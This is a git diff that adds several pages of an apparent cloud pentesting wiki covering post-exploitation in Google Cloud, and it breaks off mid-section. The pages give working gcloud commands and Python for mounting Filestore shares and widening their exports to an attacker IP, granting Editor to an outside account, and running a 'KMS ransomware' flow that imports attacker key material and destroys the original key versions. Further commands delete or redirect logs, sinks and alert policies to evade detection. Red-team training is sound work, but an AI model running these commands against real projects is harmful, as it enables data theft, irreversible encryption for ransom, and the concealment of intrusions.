+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md
new file mode 100644
index 0000000000..037d748cff
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md
@@ -0,0 +1,130 @@
+# GCP - Filestore Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Filestore
+
+For more information about Filestore check:
+
+{% content-ref url="../gcp-services/gcp-filestore-enum.md" %}
+[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md)
+{% endcontent-ref %}
+
+### Mount Filestore
+
+A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**:
+
+{% code overflow="wrap" %}
+```bash
+sudo apt-get update
+sudo apt-get install nfs-common
+# Check the share name
+showmount -e <IP>
+# Mount the share
+mkdir /mnt/fs
+sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
+```
+{% endcode %}
+
+To find the IP address of a filestore insatnce check the enumeration section of the page:
+
+{% content-ref url="../gcp-services/gcp-filestore-enum.md" %}
+[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md)
+{% endcontent-ref %}
+
+### Remove Restrictions and get extra permissions
+
+If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share:
+
+```bash
+gcloud filestore instances update nfstest \
+    --zone=<exact-zone> \
+    --flags-file=nfs.json
+
+# Contents of nfs.json
+{
+  "--file-share":
+  {
+    "capacity": "1024",
+    "name": "<share-name>",
+    "nfs-export-options": [
+      {
+        "access-mode": "READ_WRITE",
+        "ip-ranges": [
+          "<your-ip-private-address>/32"
+        ],
+        "squash-mode": "NO_ROOT_SQUASH",
+        "anon_uid": 1003,
+        "anon_gid": 1003
+      }
+    ]
+  }
+}
+```
+
+### Restore a backup
+
+If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:**
+
+```bash
+# Create a new filestore if you don't want to modify the old one
+gcloud filestore instances create <new-instance-name> \
+    --zone=<zone> \
+    --tier=STANDARD \
+    --file-share=name=vol1,capacity=1TB \
+    --network=name=default,reserved-ip-range=10.0.0.0/29
+    
+# Restore a backups in a new instance
+gcloud filestore instances restore <new-instance-name> \
+    --zone=<zone> \
+    --file-share=<instance-file-share-name> \
+    --source-backup=<backup-name> \
+    --source-backup-region=<backup-region>
+
+# Follow the previous section commands to mount it
+```
+
+### Create a backup and restore it
+
+If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned:
+
+{% code overflow="wrap" %}
+```bash
+# Create share backup
+gcloud filestore backups create <back-name> \
+    --region=<region> \
+    --instance=<instance-name> \
+    --instance-zone=<instance-zone> \
+    --file-share=<share-name>
+
+# Follow the previous section commands to restore it and mount it
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md
new file mode 100644
index 0000000000..4181accdc3
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md
@@ -0,0 +1,57 @@
+# GCP - IAM Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## IAM <a href="#service-account-impersonation" id="service-account-impersonation"></a>
+
+You can find further information about IAM in:
+
+{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
+[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
+{% endcontent-ref %}
+
+### Granting access to management console <a href="#granting-access-to-management-console" id="granting-access-to-management-console"></a>
+
+Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
+
+To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor.
+
+You can use the following command to **grant a user the primitive role of Editor** to your existing project:
+
+{% code overflow="wrap" %}
+```bash
+gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
+```
+{% endcode %}
+
+If you succeeded here, try **accessing the web interface** and exploring from there.
+
+This is the **highest level you can assign using the gcloud tool**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
new file mode 100644
index 0000000000..fb4c0cdd14
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
@@ -0,0 +1,285 @@
+# GCP - KMS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## KMS
+
+Find basic information about KMS in:
+
+{% content-ref url="../gcp-services/gcp-kms-enum.md" %}
+[gcp-kms-enum.md](../gcp-services/gcp-kms-enum.md)
+{% endcontent-ref %}
+
+### `cloudkms.cryptoKeyVersions.destroy`
+
+An attacker with this permission could destroy a KMS version. In order to do this you first need to disable the key and then destroy it:
+
+```python
+# pip install google-cloud-kms
+
+from google.cloud import kms
+
+def disable_key_version(project_id, location_id, key_ring_id, key_id, key_version):
+    """
+    Disables a key version in Cloud KMS.
+    """
+    # Create the client.
+    client = kms.KeyManagementServiceClient()
+
+    # Build the key version name.
+    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
+
+    # Call the API to disable the key version.
+    client.update_crypto_key_version(request={'crypto_key_version': {'name': key_version_name, 'state': kms.CryptoKeyVersion.State.DISABLED}})
+
+def destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version):
+    """
+    Destroys a key version in Cloud KMS.
+    """
+    # Create the client.
+    client = kms.KeyManagementServiceClient()
+
+    # Build the key version name.
+    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
+
+    # Call the API to destroy the key version.
+    client.destroy_crypto_key_version(request={'name': key_version_name})
+
+# Example usage
+project_id = 'your-project-id'
+location_id = 'your-location'
+key_ring_id = 'your-key-ring'
+key_id = 'your-key-id'
+key_version = '1'  # Version number to disable and destroy
+
+# Disable the key version
+disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)
+
+# Destroy the key version
+destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)
+```
+
+### KMS Ransomware
+
+In AWS it's possible to completely **steal a KMS key** by modifying the KMS resource policy and only allowing the attackers account to use the key. As these resource policies doesn't exist in GCP this is not possible.
+
+However, there is another way to perform a global KMS Ransomware, which would involve the following steps:
+
+* Create a new **version of the key with a key material** imported by the attacker
+
+{% code overflow="wrap" %}
+```bash
+gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL] --target-key [KEY]
+```
+{% endcode %}
+
+* Set it as **default version** (for future data being encrypted)
+* **Re-encrypt older data** encrypted with the previous version with the new one.
+* **Delete the KMS key**
+* Now only the attacker, who has the original key material could be able to decrypt the encrypted data
+
+#### Here are the steps to import a new version and disable/delete the older data:
+
+```bash
+# Encrypt something with the original key
+echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt
+gcloud kms encrypt \
+  --location us-central1 \
+  --keyring kms-lab-2-keyring \
+  --key kms-lab-2-key \
+  --plaintext-file my-plaintext-file.txt \
+  --ciphertext-file my-encrypted-file.enc
+
+# Decrypt it
+gcloud kms decrypt \
+  --location us-central1 \
+  --keyring kms-lab-2-keyring \
+  --key kms-lab-2-key \
+  --ciphertext-file my-encrypted-file.enc \
+  --plaintext-file -
+
+
+# Create an Import Job
+gcloud kms import-jobs create my-import-job \
+  --location us-central1 \
+  --keyring kms-lab-2-keyring \
+  --import-method "rsa-oaep-3072-sha1-aes-256" \
+  --protection-level "software"
+
+# Generate key material
+openssl rand -out my-key-material.bin 32
+
+# Import the Key Material (it's encrypted with an asymetrict key of the import job previous to be sent)
+gcloud kms keys versions import \
+    --import-job my-import-job \
+    --location us-central1 \
+    --keyring kms-lab-2-keyring \
+    --key kms-lab-2-key \
+    --algorithm "google-symmetric-encryption" \ 
+    --target-key-file my-key-material.bin
+
+# Get versions
+gcloud kms keys versions list \
+  --location us-central1 \
+  --keyring kms-lab-2-keyring \
+  --key kms-lab-2-key
+
+# Make new version primary
+gcloud kms keys update \
+  --location us-central1 \
+  --keyring kms-lab-2-keyring \
+  --key kms-lab-2-key \
+  --primary-version 2
+
+# Try to decrypt again (error)
+gcloud kms decrypt \
+  --location us-central1 \
+  --keyring kms-lab-2-keyring \
+  --key kms-lab-2-key \
+  --ciphertext-file my-encrypted-file.enc \
+  --plaintext-file -
+
+# Disable initial version
+gcloud kms keys versions disable \
+  --location us-central1 \
+  --keyring kms-lab-2-keyring \
+  --key kms-lab-2-key 1
+
+# Destroy the old version
+gcloud kms keys versions destroy \
+  --location us-central1 \
+  --keyring kms-lab-2-keyring \
+  --key kms-lab-2-key \
+  --version 1
+
+```
+
+### `cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`
+
+```python
+from google.cloud import kms
+import base64
+
+def encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext):
+    """
+    Encrypts data using a symmetric key from Cloud KMS.
+    """
+    # Create the client.
+    client = kms.KeyManagementServiceClient()
+
+    # Build the key name.
+    key_name = client.crypto_key_path(project_id, location_id, key_ring_id, key_id)
+
+    # Convert the plaintext to bytes.
+    plaintext_bytes = plaintext.encode('utf-8')
+
+    # Call the API.
+    encrypt_response = client.encrypt(request={'name': key_name, 'plaintext': plaintext_bytes})
+    ciphertext = encrypt_response.ciphertext
+
+    # Optional: Encode the ciphertext to base64 for easier handling.
+    return base64.b64encode(ciphertext)
+
+# Example usage
+project_id = 'your-project-id'
+location_id = 'your-location'
+key_ring_id = 'your-key-ring'
+key_id = 'your-key-id'
+plaintext = 'your-data-to-encrypt'
+
+ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext)
+print('Ciphertext:', ciphertext)
+```
+
+### `cloudkms.cryptoKeyVersions.useToSign`
+
+```python
+import hashlib
+from google.cloud import kms
+
+def sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message):
+    """
+    Sign a message using an asymmetric key version from Cloud KMS.
+    """
+    # Create the client.
+    client = kms.KeyManagementServiceClient()
+
+    # Build the key version name.
+    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
+
+    # Convert the message to bytes and calculate the digest.
+    message_bytes = message.encode('utf-8')
+    digest = {'sha256': hashlib.sha256(message_bytes).digest()}
+
+    # Call the API to sign the digest.
+    sign_response = client.asymmetric_sign(name=key_version_name, digest=digest)
+    return sign_response.signature
+
+# Example usage for signing
+project_id = 'your-project-id'
+location_id = 'your-location'
+key_ring_id = 'your-key-ring'
+key_id = 'your-key-id'
+key_version = '1'
+message = 'your-message'
+
+signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message)
+print('Signature:', signature)
+```
+
+### `cloudkms.cryptoKeyVersions.useToVerify`
+
+```python
+from google.cloud import kms
+import hashlib
+
+def verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature):
+    """
+    Verify a signature using an asymmetric key version from Cloud KMS.
+    """
+    # Create the client.
+    client = kms.KeyManagementServiceClient()
+
+    # Build the key version name.
+    key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)
+
+    # Convert the message to bytes and calculate the digest.
+    message_bytes = message.encode('utf-8')
+    digest = {'sha256': hashlib.sha256(message_bytes).digest()}
+
+    # Build the verify request and call the API.
+    verify_response = client.asymmetric_verify(name=key_version_name, digest=digest, signature=signature)
+    return verify_response.success
+
+# Example usage for verification
+verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature)
+print('Verified:', verified)
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
new file mode 100644
index 0000000000..9217a9fadf
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
@@ -0,0 +1,175 @@
+# GCP - Logging Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+For more information check:
+
+{% content-ref url="../gcp-services/gcp-logging-enum.md" %}
+[gcp-logging-enum.md](../gcp-services/gcp-logging-enum.md)
+{% endcontent-ref %}
+
+For other ways to disrupt monitoring check:
+
+{% content-ref url="gcp-monitoring-post-exploitation.md" %}
+[gcp-monitoring-post-exploitation.md](gcp-monitoring-post-exploitation.md)
+{% endcontent-ref %}
+
+### Default Logging
+
+**By default you won't get caught just for performing read actions. Fore more info check the Logging Enum section.**
+
+### Add Excepted Principal
+
+In [https://console.cloud.google.com/iam-admin/audit/allservices](https://console.cloud.google.com/iam-admin/audit/allservices) and [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) is possible to add principals to not generate logs. An attacker could abuse this to prevent being caught.
+
+### Read logs - `logging.logEntries.list`
+
+{% code overflow="wrap" %}
+```bash
+# Read logs
+gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json
+
+# Everything from a timestamp
+gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json
+
+# Use these options to indicate a different bucket or view to use: --bucket=_Required  --view=_Default
+```
+{% endcode %}
+
+### `logging.logs.delete`
+
+{% code overflow="wrap" %}
+```bash
+# Delete all entries from a log in the _Default log bucket - logging.logs.delete
+gcloud logging logs delete <log-name>
+```
+{% endcode %}
+
+### Write logs - `logging.logEntries.create`
+
+{% code overflow="wrap" %}
+```bash
+# Write a log entry to try to disrupt some system
+gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
+```
+{% endcode %}
+
+### `logging.buckets.update`
+
+{% code overflow="wrap" %}
+```bash
+# Set retention period to 1 day (_Required has a fixed one of 400days)
+
+gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1
+```
+{% endcode %}
+
+### `logging.buckets.delete`
+
+```bash
+# Delete log bucket
+gcloud logging buckets delete BUCKET_NAME --location=<location>
+```
+
+### `logging.links.delete`
+
+{% code overflow="wrap" %}
+```bash
+# Delete link
+gcloud logging links delete <link-id> --bucket <bucket> --location <location>
+```
+{% endcode %}
+
+### `logging.views.delete`
+
+```bash
+# Delete a logging view to remove access to anyone using it
+gcloud logging views delete <view-id> --bucket=<bucket> --location=global
+```
+
+### `logging.views.update`
+
+{% code overflow="wrap" %}
+```bash
+# Update a logging view to hide data
+gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"
+```
+{% endcode %}
+
+### `logging.logMetrics.update`
+
+{% code overflow="wrap" %}
+```bash
+# Update log based metrics - logging.logMetrics.update
+gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
+```
+{% endcode %}
+
+### `logging.logMetrics.delete`
+
+```bash
+# Delete log based metrics - logging.logMetrics.delete
+gcloud logging metrics delete <metric-name>
+```
+
+### `logging.sinks.delete`
+
+```bash
+# Delete sink - logging.sinks.delete
+gcloud logging sinks delete <sink-name>
+```
+
+### `logging.sinks.update`
+
+{% code overflow="wrap" %}
+```bash
+# Disable sink - logging.sinks.update
+gcloud logging sinks update <sink-name> --disabled
+
+# Createa filter to exclude attackers logs - logging.sinks.update
+gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"
+
+# Change where the sink is storing the data - logging.sinks.update
+gcloud logging sinks update <sink-name> new-destination 
+
+# Change the service account to one withuot permissions to write in the destination - logging.sinks.update
+gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID
+
+# Remove explusions to try to overload with logs - logging.sinks.update
+gcloud logging sinks update SINK_NAME --clear-exclusions
+
+# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
+gcloud logging sinks update SINK_NAME --use-partitioned-tables
+gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
new file mode 100644
index 0000000000..d1ec7ef27c
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
@@ -0,0 +1,146 @@
+# GCP - Monitoring Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Monitoring
+
+Fore more information check:
+
+{% content-ref url="../gcp-services/gcp-monitoring-enum.md" %}
+[gcp-monitoring-enum.md](../gcp-services/gcp-monitoring-enum.md)
+{% endcontent-ref %}
+
+For other ways to disrupt logs check:
+
+{% content-ref url="gcp-logging-post-exploitation.md" %}
+[gcp-logging-post-exploitation.md](gcp-logging-post-exploitation.md)
+{% endcontent-ref %}
+
+### `monitoring.alertPolicies.delete`
+
+Delete an alert policy:
+
+```bash
+gcloud alpha monitoring policies delete <policy>
+```
+
+### `monitoring.alertPolicies.update`
+
+Disrupt an alert policy:
+
+```bash
+# Disable policy
+gcloud alpha monitoring policies update <alert-policy> --no-enabled
+
+# Remove all notification channels
+gcloud alpha monitoring policies update <alert-policy> --clear-notification-channels
+
+# Chnage notification channels
+gcloud alpha monitoring policies update <alert-policy> --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL
+
+# Modify alert conditions
+gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
+# or use --policy-from-file <policy-file>
+```
+
+### `monitoring.dashboards.update`
+
+Modify a dashboard to disrupt it:
+
+```bash
+# Disrupt dashboard
+gcloud monitoring dashboards update <dashboard> --config='''
+  displayName: New Dashboard with New Display Name
+  etag: 40d1040034db4e5a9dee931ec1b12c0d
+  gridLayout:
+    widgets:
+    - text:
+        content: Hello World
+  '''
+```
+
+### `monitoring.dashboards.delete`
+
+Delete a dashboard:
+
+```bash
+# Delete dashboard
+gcloud monitoring dashboards delete <dashboard>
+```
+
+### `monitoring.snoozes.create`
+
+Prevent policies from generating alerts by creating a snoozer:
+
+{% code overflow="wrap" %}
+```bash
+# Stop alerts by creating a snoozer
+gcloud monitoring snoozes create --display-name="Maintenance Week" \
+    --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
+    --start-time="2023-03-01T03:00:00.0-0500" \
+    --end-time="2023-03-07T23:59:59.5-0500"
+```
+{% endcode %}
+
+### `monitoring.snoozes.update`
+
+Update the timing of a snoozer to prevent alerts from being created when the attacker is interested:
+
+{% code overflow="wrap" %}
+```bash
+# Modify the timing of a snooze
+gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME
+
+# odify everything, including affected policies
+gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
+```
+{% endcode %}
+
+### `monitoring.notificationChannels.delete`
+
+Delete a configured channel:
+
+```bash
